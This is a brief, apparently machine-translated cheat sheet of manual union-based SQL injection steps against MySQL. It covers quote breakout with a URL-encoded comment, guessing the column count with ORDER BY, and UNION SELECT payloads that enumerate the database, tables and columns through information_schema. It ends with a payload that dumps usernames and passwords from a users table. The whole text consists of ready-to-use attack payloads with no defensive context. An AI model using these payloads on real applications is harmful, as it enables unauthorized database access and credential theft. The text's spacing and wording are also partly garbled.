1. Generally use the ' ") and other symbols to close, and then use%23 (that is, #) to comment on the following statement.
2. Find the database, first use ORDER by N to guess the field, and then use Union Select ... n%23 to query.
Union select 1,2,database ()%23
3. Use the Tables table in the INFORMATION_SCHEMA library to check the first table in the MySQL database.
Select table_name from information_schema.tables where table_schema= ' mysql ' limit 0, 1;
Union SELECT 1,2,GROUP_CONCAT (table_name) from Information_schema.tables where table_schema= ' security '%23
4. Use the Columns table in the INFORMATION_SCHEMA library to check the first column name in the user table in the MySQL database.
Select column_name from information_schema.columns where table_schema= ' MySQL ' and table_name= ' user ' limit 0, 1;
Union Select 1,2,group_concat (column_name) from Information_schema.columns where table_schema= ' security ' and Table_ Name= ' users '%23
5. Know the name of the library, the name of the table, the name of the column directly check data
Union Select 1,GROUP_CONCAT (username), Group_concat (password) from users%23
MySQL Manual injection steps